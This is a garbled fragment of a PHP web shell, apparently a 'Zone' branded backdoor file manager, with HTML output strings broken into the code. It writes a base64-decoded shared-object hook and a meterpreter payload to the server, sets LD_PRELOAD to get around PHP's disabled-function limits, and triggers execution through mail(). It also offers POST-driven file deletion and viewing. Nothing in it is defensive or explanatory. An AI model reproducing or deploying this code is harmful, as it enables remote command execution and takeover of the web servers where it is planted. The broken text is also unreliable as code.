Result: ' . $fileName . '
Error: File not found!
Result: base64 : ' . $meterpreter .'Please Refresh and Check File test.txt, this output commandtest.txt created = VULNtest.txt not created = NOT VULNexample access: domain.com/yourpath/path/test.txtPowered By Zone'; $a($full . '/chankro.so', $base($hook)); $a($full . '/acpid.socket', $base($meterpreter)); $p('CHANKRO=' . $full . '/acpid.socket'); $p('LD_PRELOAD=' . $full . '/chankro.so'); $m('a','a','a','a'); }elseif (isset($_POST['delete_file'])) { $fileToDelete = $currentDirectory . '/' . $_POST['delete_file']; if (file_exists($fileToDelete)) { if (is_dir($fileToDelete)) { if (deleteDirectory($fileToDelete)) { echo '
Error:
Result:
Result: ' . $_POST['view_file'] . '